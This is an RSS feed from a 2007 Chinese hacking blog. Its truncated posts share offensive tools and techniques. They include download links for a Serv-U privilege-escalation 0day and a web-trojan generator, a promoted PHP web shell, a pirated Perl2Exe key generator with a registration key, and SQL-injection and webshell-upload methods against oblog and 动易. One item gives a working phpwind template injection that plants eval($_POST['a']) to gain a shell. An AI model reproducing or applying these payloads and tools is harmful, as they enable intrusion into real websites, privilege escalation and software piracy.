<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[装B吧...]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[　　　菜刀砍电线，装B遭雷P...]]></description>
<link>http://hi.baidu.com/hehe9011</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[...]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/47fb9b514f26602543a75b6c.html]]></link>
        <description><![CDATA[
		
		躲到一个阴暗的社会角落里去了...找得到就找...呵呵 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%D0%C4%C7%E9%CD%BF%D1%BB%26%2347%3Bmood">心情涂鸦&#47;mood</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/47fb9b514f26602543a75b6c.html#comment">查看评论</a>]]></description>
        <pubDate>Thu, 26 Apr 2007 19:06:56 +0800</pubDate>
        <category><![CDATA[心情涂鸦&#47;mood]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/47fb9b514f26602543a75b6c.html</guid>
</item>

<item>
        <title><![CDATA[oblog4.0&4.5漏洞利用/工具/软件]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/7ed5dc338104bb42ac4b5f60.html]]></link>
        <description><![CDATA[
		
		<p>来自:http://www.hackm.com/read.php?tid-2014.html</p>
<p>作者:<strong>28度的冰</strong></p>
<div class="tpc_content">写得相当的草率。<br>
1，直接爆密码的只是考虑到了直接报错能爆出密码的情况。所以没有涉及到特征字符，也没有用二分法猜解密码。所以不太好用。<br>
2，sql的如果遇到sa执行命令自然爽，可是我测试条件有限，没有能遇到sa的，所以没有完善代码，如果点了命令之后蹦出一个msgbox那说明命令执行成功...。对于DBO权限，列目录还是可以的,只不过有些不方便。。。<br>
对了 好像还少一个log备份shell功能</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%BA%DA%BF%CD%C8%ED%BC%FE%26%2347%3Btools">黑客软件&#47;tools</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/7ed5dc338104bb42ac4b5f60.html#comment">查看评论</a>]]></description>
        <pubDate>Tue, 24 Apr 2007 19:30:35 +0800</pubDate>
        <category><![CDATA[黑客软件&#47;tools]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/7ed5dc338104bb42ac4b5f60.html</guid>
</item>

<item>
        <title><![CDATA[Shell I---phpshell]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/9b9dcb1b6de09afbae51330e.html]]></link>
        <description><![CDATA[
		
		又一个来自国外的phpshell，在milw0rm看到的。<br>
关于为什么起这个名字，作者说：“Couldn't think of a name so it became "Shell I"...”<br>
phpshell不稀奇了，介绍这个phpshell主要是他有一个比较有新意的功能：md5 cracker with custom options<br>
可以直接在这个phpshell中利用当前网站服务器进行md5的暴力破解。<br>
 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%BA%DA%BF%CD%C8%ED%BC%FE%26%2347%3Btools">黑客软件&#47;tools</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/9b9dcb1b6de09afbae51330e.html#comment">查看评论</a>]]></description>
        <pubDate>Mon, 23 Apr 2007 19:09:46 +0800</pubDate>
        <category><![CDATA[黑客软件&#47;tools]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/9b9dcb1b6de09afbae51330e.html</guid>
</item>

<item>
        <title><![CDATA[OBLOG4.0 OBLOG4.5通杀]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/f26998160ebaca50f3de32d0.html]]></link>
        <description><![CDATA[
		
		漏洞文件：js.asp <br>
<br>
&lt;%<br>
Dim oblog<br>
set oblog=new class_sys<br>
oblog.autoupdate=False<br>
oblog.start<br>
dim js_blogurl,n<br>
js_blogurl=Trim(oblog.CacheConfig(3))<br>
n=CInt(Request(”n”))<br>
if n=0 then n=1<br>
select case CInt(Request(”j”))<br>
case 1<br>
call tongji()<br>
case 2<br>
call topuser()<br>
case 3<br>
call adduser()<br>
case 4<br>
call listclass()<br>
case 5<br>
call showusertype()<br>
case 6<br>
call listbestblog()<br>
case 7<br>
call showlogin()<br>
case 8 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%BA%DA%BF%CD%BC%BC%CA%F5%26%2347%3Barchives">黑客技术&#47;archives</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/f26998160ebaca50f3de32d0.html#comment">查看评论</a>]]></description>
        <pubDate>Sun, 22 Apr 2007 17:41:25 +0800</pubDate>
        <category><![CDATA[黑客技术&#47;archives]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/f26998160ebaca50f3de32d0.html</guid>
</item>

<item>
        <title><![CDATA[SU通杀提权利用工具]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/a9b8d4c8b9b9ac167f3e6fd6.html]]></link>
        <description><![CDATA[
		
		<p>通杀所有版本SERV-U的提权程序,未做测试，内附动画演示,<br>
<br>
哪个小朋友试了拜托写下...THX~~~<br>
</p>
<p>下载地址:<a target="_blank" href="http://www.live-share.com/files/207829/serv-u_0day.rar.html">http://www.live-share.com/files/207829/serv-u_0day.rar.html</a></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%BA%DA%BF%CD%C8%ED%BC%FE%26%2347%3Btools">黑客软件&#47;tools</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/a9b8d4c8b9b9ac167f3e6fd6.html#comment">查看评论</a>]]></description>
        <pubDate>Sun, 22 Apr 2007 17:39:03 +0800</pubDate>
        <category><![CDATA[黑客软件&#47;tools]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/a9b8d4c8b9b9ac167f3e6fd6.html</guid>
</item>

<item>
        <title><![CDATA[Perl2Exe V8.80 + 注册机]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/1ae55ceea61237fab2fb9597.html]]></link>
        <description><![CDATA[
		
		注：方便编译perl写的EXP。就像以前发过的可以将php的exp转换成exe的 Bambalam PHP EXE Compiler/Embedder 。<br>
<br>
来源：7jdg's Blog<br>
<br>
很久没有用过这东西了,今天从机子上找出来一个是8.4版的,老的不能用了..来个新的,带注册机<br>
引用 <br>
C:p2x-8.80-Win32&gt;perl2exe -register<br>
Perl2Exe V8.80 Copyright (c) 1997-2006 IndigoSTAR Software<br>
Please enter your registration key, or press enter to cancel<br>
1v1:name:20070320,54419<br>
Registered<br>
引用 <br>
C:p2x-8.80-Win32&gt;perl2exe<br>
Per 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%BA%DA%BF%CD%C8%ED%BC%FE%26%2347%3Btools">黑客软件&#47;tools</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/1ae55ceea61237fab2fb9597.html#comment">查看评论</a>]]></description>
        <pubDate>Sat, 21 Apr 2007 19:29:28 +0800</pubDate>
        <category><![CDATA[黑客软件&#47;tools]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/1ae55ceea61237fab2fb9597.html</guid>
</item>

<item>
        <title><![CDATA[SQL Injection技巧的演练]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/2c4a56432b14ee109213c63e.html]]></link>
        <description><![CDATA[
		
		作者：sk@scan-associates.net <br>
来自：<a title="http://www.securiteam.com/" href="http://www.securiteam.com/" target="_blank">http://www.securiteam.com/</a> <br>
翻译：DemonAlex <br>
更新：2006年11月11日 　 <br>
<br>
摘要:<br>
下文是为了帮助那些希望能掌握这个漏洞的运用、并想得知如何保护自己免受这种漏洞攻击的人了解该漏 洞的本质而写的。<br>
<br>
详细资料:<br>
<br>
1.0绪论<br>
当一台机器只开放了80端口(这里指的是提供HTTP服务)时，可能你的大多数漏洞扫描器都不能给到你很多 有价值的信息(漏洞信息)，倘 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%BA%DA%BF%CD%BC%BC%CA%F5%26%2347%3Barchives">黑客技术&#47;archives</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/2c4a56432b14ee109213c63e.html#comment">查看评论</a>]]></description>
        <pubDate>Thu, 19 Apr 2007 18:58:57 +0800</pubDate>
        <category><![CDATA[黑客技术&#47;archives]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/2c4a56432b14ee109213c63e.html</guid>
</item>

<item>
        <title><![CDATA[突破动易拿webshell]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/7b62bc12f08c99cfc3fd7887.html]]></link>
        <description><![CDATA[
		
		作者: close999 <br>
来源:红狼安全小组(<a href="http://www.wolfexp.net/" target="_blank">www.wolfexp.net</a>,<a href="http://www.crst.com.cn/" target="_blank">www.crst.com.cn</a>)<br>
<br>
<br>
原理&nbsp;&nbsp;&nbsp; : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa<br>
突破的前提条件是&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : 服务器是win2003 全功能的空间<br>
<br>
<br>
**************************************************<br>
'函数名：UserNamefilter(<br>
'作&nbsp;&nbsp; 用：过滤用户名(增强过滤,用户名现 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%BA%DA%BF%CD%BC%BC%CA%F5%26%2347%3Barchives">黑客技术&#47;archives</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/7b62bc12f08c99cfc3fd7887.html#comment">查看评论</a>]]></description>
        <pubDate>Wed, 18 Apr 2007 18:29:54 +0800</pubDate>
        <category><![CDATA[黑客技术&#47;archives]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/7b62bc12f08c99cfc3fd7887.html</guid>
</item>

<item>
        <title><![CDATA[平凡多功能自升级网马生成器超酷版V1.0]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/8fac9982c63696be6c811985.html]]></link>
        <description><![CDATA[
		
		<p>来自安全警戒线论坛~~</p>
<p><br>
<img border="0" src="http://www.hackeroo.com/attachment/6_19696_817cad3f353bcff.jpg"> </p>
<div class="tpc_content">平凡多功能自升级网马生成器超酷版V1.0</div>
<div class="tpc_content"></div>
<div class="tpc_content">下载地址:<a target="_blank" href="http://www.live-share.com/files/204599/4.18.rar.html">http://www.live-share.com/files/204599/4.18.rar.html</a></div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%BA%DA%BF%CD%C8%ED%BC%FE%26%2347%3Btools">黑客软件&#47;tools</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/8fac9982c63696be6c811985.html#comment">查看评论</a>]]></description>
        <pubDate>Wed, 18 Apr 2007 18:26:09 +0800</pubDate>
        <category><![CDATA[黑客软件&#47;tools]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/8fac9982c63696be6c811985.html</guid>
</item>

<item>
        <title><![CDATA[phpwind后台拿shell 方法]]></title>
        <link><![CDATA[http://hi.baidu.com/hehe9011/blog/item/e6c64fedaac5ded5b21cb14e.html]]></link>
        <description><![CDATA[
		
		<p>来源:猪猪's blog</p>
<p><span style="COLOR: red">方式1 模板法</span><br>
<br>
进入后台， 风格模版设置 ，在随便一行写代码<br>
记住，这代码必须顶着左边行写，代码前面不可以有任何字符。<br>
EOT;<br>
eval($a);<br>
print &lt;&lt;<br>
<br>
例如，我写完某一行为。<br>
.headurl { color:#ffffff;}<br>
EOT;<br>
eval($_POST[’a’]);<br>
print &lt;&lt;.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}<br>
<br>
而后得到一个shell<br>
</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hehe9011/blog/category/%BA%DA%BF%CD%BC%BC%CA%F5%26%2347%3Barchives">黑客技术&#47;archives</a>&nbsp;<a href="http://hi.baidu.com/hehe9011/blog/item/e6c64fedaac5ded5b21cb14e.html#comment">查看评论</a>]]></description>
        <pubDate>Mon, 16 Apr 2007 19:33:01 +0800</pubDate>
        <category><![CDATA[黑客技术&#47;archives]]></category>
        <author><![CDATA[hehe9011]]></author>
		<guid>http://hi.baidu.com/hehe9011/blog/item/e6c64fedaac5ded5b21cb14e.html</guid>
</item>


</channel>
</rss>